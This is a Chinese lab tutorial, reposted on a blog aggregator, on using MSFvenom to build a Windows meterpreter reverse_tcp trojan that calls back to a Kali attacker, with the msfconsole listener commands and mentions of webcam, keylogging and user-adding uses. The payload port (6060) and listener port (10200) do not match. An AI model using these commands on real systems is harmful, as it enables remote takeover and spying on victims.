码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • MSFvenom恶意程序生成与利用


    MSFvenom

    1.1 MSFvenom介绍

    MSFvenom是Msfpayload和Msfencode的组合,可以生成各种攻击载荷,并且可以对载荷进行编码。做渗透测试时往往需要将有效负载部署在目标系统上,而msfvenom可以快速创建符合靶机的载荷,Msfvenom 包含标准的命令行选项。可以为许多平台生成有效负载,如Android,Windows,Unix,Nodejs,Cisco等等。

    英文介绍

    英文介绍来源:https://www.offsec.com(网站有风险打开需谨慎)

    1.2 MSFvenom 简单使用

    示例说明:今天利用MSFvenom 制作一个 .exe 的木马文件,然后通过win7的永恒之蓝漏洞发送到靶机Windows机器的C盘根目录并运行(这里为了加深了解永恒之蓝操作,也可以手动发送至win7)。运行后就可以在Kali系统上面利用msfconsole连接msfvenom服务控制靶机。

    1.2.1 MSFvenom手册

    #> man msfvenom
    

    1.2.2 环境介绍

    攻击机:

    项目 参数 备注
    机器类型 攻击机
    操作系统 kali
    IP地址 192.168.2.214

    靶机:

    项目 参数 备注
    机器类型 靶机
    操作系统 win7 关闭防火墙卸载相关杀毒软件
    IP地址 192.168.2.233

    win7网路配置

    1.2.3 木马文件生成

    #>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.214 LPORT=6060 -f exe>1.exe
    

    命令解说:

    命令 说明 备注
    windows/meterpreter/reverse_tcp 有效载荷类型,可以根据实际情况进行选择
    LHOST 攻击机的IP,即靶机点击程序后回链的ip
    LPORT 攻击机的端口,即靶机点击程序后回链的端口
    -f 输出的格式

    1.2.4 设置侦听

    启动msfconsole

    #> msfconsole 
    

    设置监听

    msf6>use exploit/multi/handler
    
    msf6>set payload windows/meterpreter/reverse_tcp
    
    msf6>set lhost 192.168.2.214 #攻击机ip
    
    msf6>set lport 10200 #链接端口
    
    msf6>exploit/run #运行
    

    1.2.5 在靶机中运行程序

    将文件拷贝到靶机并运行(直接拷贝或通过永恒之蓝漏洞上传,参考《渗透基础+永恒之蓝演练》)。

    1.2.6 程序生效,执行相关SHELL

    运行1.exe文件

    在运行的瞬间,kali就已经监听并链接成功!下一步可以进行启用摄像头、增加用户并分配权限、监听键盘、截屏等操作。


    普法宣传人人有责。国家法律法规数据库-中华人民共和国网络安全法

  • 相关阅读:
    redis 中的八大问题
    Javaweb回炉简要学习笔记
    不容易解的题10.4(kmp算法的应用和讲解)
    asp.net core webapi接收application/x-www-form-urlencoded和form-data参数
    思科认证 | CCNP怎么快速拿证?
    FastDFS安装(含nginx)
    【Auth Proxy】为你的 Web 服务上把锁
    MySQL导出sql脚本文件
    基于微信电器家电商城小程序系统设计与实现 开题报告
    java毕业生设计中小型酒店客房预订系统计算机源码+系统+mysql+调试部署+lw
  • 原文地址:https://www.cnblogs.com/fangyuxi2010/p/17767167.html
  • 最新文章
  • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
    用 Hashids 优雅解决 C 端自增 ID 暴露问题
    V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
    LLVM Pass快速入门(四):代码插桩
    milkup:桌面端 markdown AI续写和即时渲染
    基于项目工程构建SBOM(软件物料清单)的研究
    鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
    .NET 中如何快速实现 List 集合去重?
    扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
    浅谈数据访问层
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号